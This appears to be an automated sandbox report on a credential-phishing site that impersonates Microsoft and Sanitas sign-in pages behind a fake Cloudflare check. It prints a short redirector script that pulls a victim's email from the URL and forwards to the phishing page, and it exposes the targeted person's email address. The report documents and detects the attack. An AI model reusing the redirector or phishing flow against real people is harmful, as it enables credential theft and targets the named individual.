URL: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":true, "trigger_text":"Browser verification to protect your browsing experience.", "prominent_button_name":"unknown", "text_input_field_labels":"unknown", "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "trigger_text":"Sign in", "prominent_button_name":"Next", "text_input_field_labels":["jperalta@sanitas.es"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== Model: jbxai	{ "brand":["Sanitas"], "contains_trigger_text":true, "trigger_text":"Enter password", "prominent_button_name":"Sign in", "text_input_field_labels":["Password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== Model: jbxai	{ "phishing_score":9, "brands":"Sanitas", "legit_domain":"sanitas.com", "classification":"known", "reasons":["The brand 'Sanitas' is known and associated with healthcare and wellness products.", "The URL 'bluntchiefei.za.com' does not match the legitimate domain 'sanitas.com'.", "The domain 'za.com' is unusual and not typically associated with the Sanitas brand.", "The presence of a password input field on a non-matching domain is suspicious.", "The URL contains an unrelated subdomain 'bluntchiefei', which is a common tactic in phishing attempts."], "brand_matches":[false], "url_match":false, "brand_input":"Sanitas", "input_fields":"Password"}

URL: https://bluntchiefei.za.com/XTCfX/#XaXBlcmFsdGFAc2FuaXRhcy5lcw== Model: jbxai	{ "phishing_score":9, "brands":"Microsoft", "legit_domain":"microsoft.com", "classification":"wellknown", "reasons":["The brand 'Microsoft' is well-known and has a well-established domain 'microsoft.com'.", "The provided URL 'bluntchiefei.za.com' does not match the legitimate domain 'microsoft.com'.", "The URL contains an unusual domain extension '.za.com' which is not typically associated with Microsoft.", "The URL has no clear association with Microsoft, and the domain name 'bluntchiefei' is suspicious and unrelated to Microsoft.", "The email domain 'sanitas.es' does not provide any additional context to validate the URL."], "brand_matches":[false], "url_match":false, "brand_input":"Microsoft", "input_fields":"jperalta@sanitas.es"}

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 11:03:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.979461532653036
Encrypted:	false
SSDEEP:
MD5:	1E3E51F6F5D9442DD6D439918B50F79F
SHA1:	1EAB9BCE2724C59E94FE12284E628621BE624D05
SHA-256:	862FD541F92C88053C88607F0A0C3588389C934CB49C4A62DA383BB753A538B7
SHA-512:	4AEB20DE217BDDA7BA8466C7A72885E919EEBA502E5ADD9DDBBC9004F8FA6B4F8F61C54136F7C02D38448107B9C5558555FFD407A1B961C6FC627A0C34DBEB29
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....1<.0...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Yg`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 11:03:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9940505314525967
Encrypted:	false
SSDEEP:
MD5:	FCA3BB798EA75AE99D25BEF66A8C8DA0
SHA1:	3E1997F2CC5AD4D03FC138422E42568EBB08868E
SHA-256:	0F02CBD5838371D60BB94A32E036CE0700B4C3CC45F85ABDF8FF0A7479D36946
SHA-512:	D826A5C9C2B47DD4E76A50CFA4F7810EE5B77B8227664CD9F50B723C0907B8A3851FA0A2CEB53F84AA9B1BEFEF585FD15B196883FBFEA5769CD625DA17C1D218
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....f.0...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Yg`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.0059356484755035
Encrypted:	false
SSDEEP:
MD5:	068FCE4B10D25534AFAC57489F1DF994
SHA1:	B4B9B3332365FF64C9C2DD1E7C48499B3FEC5279
SHA-256:	0EA78440EE3328A888A085791E3A1AE89ADCBAA570AC2979F4FB27853DC037D6
SHA-512:	2BEEE63945749D70D5762A58DD14B83EB9CDB553A5A61BDA22CC71DFBC5FE3757C8B8752DFF4DBFE8BCC27E48896C35B947212DC2EFDDEADD447B27EDE645AC6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 11:03:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.992635899692216
Encrypted:	false
SSDEEP:
MD5:	3BE1707E29093E0E7DB7EC980DA3D99B
SHA1:	67E4AD539CD4BEEB0592BF330FC57DE205B55E98
SHA-256:	8CB903F0076B7F89E5BEEE0E7960974B7948CB9EC242C27521D1247E0D772AD7
SHA-512:	CA6248C563A059F155E7D852A3F629B6EE7B72E5B4950E7922533DF074161F01707F318F91739C6A5752CF5D3BF8F0288AB99C2BB60368500EC7B6CE18EE0ED7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....^..0...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Yg`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 11:03:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.982256872832645
Encrypted:	false
SSDEEP:
MD5:	248667E64F1B87EBB7EA7A5FD0115083
SHA1:	9BC3D390B3627B479E4E4FCF0CAFF645106163BE
SHA-256:	08BD5748F5C6B912D70D071B4F4EC372AFFBF306E9FFC1FAE0C12C2F5C28993F
SHA-512:	C6CFE5D4ABD210B46295DCFF2FB32F9C0FC045CBB9B0377012A12B129AFE3C605DA6F324C3E195C26BB9514E8F37CEF255C86BD97579C964102D7EE624CDC308
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......0...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Yg`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 11:03:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.991398930798437
Encrypted:	false
SSDEEP:
MD5:	F50EC97D6657B536C4FFFF33A32EF562
SHA1:	2D1A3B9893E1B2FFB6C49816EB9C88D7145C692E
SHA-256:	1DA5C027750963B0B52A4ADEDE4669751FDBA1312605FD037C9AB826E054B7B3
SHA-512:	8B7B2CFFD302B1A1F2EA2424F84160AD97FF8C36832476766CE090309CDC88A123435F041D487389AFC1A9F458BF45F009FDF3A6C0C5B1EB3FC3F1BA8AF4261E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....5.0...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y[`....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Yf`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Yf`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Yf`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Yg`...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........pASw.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 131

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 133

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	1249
Entropy (8bit):	5.242453121762845
Encrypted:	false
SSDEEP:
MD5:	F58515DFE987F7E027C8A71BBC884621
SHA1:	BEC6AEBF5940EA88FBBFF5748D539453D49FA284
SHA-256:	679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
SHA-512:	F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
Malicious:	false
Reputation:	unknown
URL:	https://bluntchiefei.za.com/favicon.ico
Preview:	<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px

Chrome Cache Entry: 134

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 138

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	downloaded
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 139

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	776
Entropy (8bit):	4.715898035311889
Encrypted:	false
SSDEEP:
MD5:	649E4B6F539BDFA0DD253EA9B057A749
SHA1:	D3155019A7D150F0CBFF0FD1AAC7AA2320D6239D
SHA-256:	71F1C5B8C8EE293B67902DE4418AEA4A3F953748A5E0AF6431A2EC6FACD6493B
SHA-512:	15E80F8AEEF3FBF0A02A120F43FE9247EFB2DE269072B72D962B3D024A2570DB5B4747AE270881B38A4D4101012674DC5301148C7A0023865AA4B79A7FFB4C0A
Malicious:	false
Reputation:	unknown
URL:	https://www.curiosolucky.com/dos/
Preview:	<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Redirecting...</title>. <script>. function redirectToDomain() {. const hash = window.location.hash; // Keep the full hash including #X. const encodedEmail = decodeURIComponent(hash.substring(2)); // Extract email from #X[email].. if (encodedEmail) {. sessionStorage.setItem('email', encodedEmail);. // Redirect keeping the '#X' in the URL. window.location.href = `https://bluntchiefei.za.com/XTCfX/${hash}`;. }. }.. document.addEventListener('DOMContentLoaded', redirectToDomain);. </script>.</head>.<body>.</body>.</html>.

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47261)
Category:	downloaded
Size (bytes):	47262
Entropy (8bit):	5.3974731018213795
Encrypted:	false
SSDEEP:
MD5:	E07E7ED6F75A7D48B3DF3C153EB687EB
SHA1:	4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
SHA-256:	96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
SHA-512:	A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
Preview:	"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 84 x 63, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.035372245524404
Encrypted:	false
SSDEEP:
MD5:	9DE8282B2D8751FFDFA0DAA29BE39639
SHA1:	34A84A771088F4A12458039231EF62DBF72E8BDD
SHA-256:	95898808D967AC32F59A7DE0029C3BBE7FD05892BB16684F4DB3D869F760475C
SHA-512:	F4F9A6A68C33B9B1D8E3EA1759437CA0F774139B596C9C72B68058611E1A6A473B46D67438FD69EF3ABB82F9A404E13D8CC0A90E53BEC86C4D53631A97903F1C
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cb411a3dd7943c2/1727697799377/63MtvjIVFrb0y85
Preview:	.PNG........IHDR...T...?......:x.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 142

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (485), with CRLF line terminators
Category:	dropped
Size (bytes):	6643
Entropy (8bit):	4.722214194204405
Encrypted:	false
SSDEEP:
MD5:	4794D32F0B849CACB307285DCF12E0FA
SHA1:	A498C9DA92D6EDBFDE23FA2C1430690D80B91211
SHA-256:	C901CDBCE6F2E4D875F6C83A80A0411AC8908A58340ADB60CB7D18570D5768C8
SHA-512:	581E9CDCE28F015B038DF2CA7D413D3D631951547A8742E428EF851755F2CE328E7E18E2CF01F75785C2CFA461232D07B5C1205F3D1F8CE4D9C5ABF686EE0FBE
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Dream Car Club - synthsparkwe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://synthsparkwe.ru/#">.. <i class="fas fa-car"></i> Dream Car Club .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-toggler-icon"></span>..

Static File Info

⊘No static file info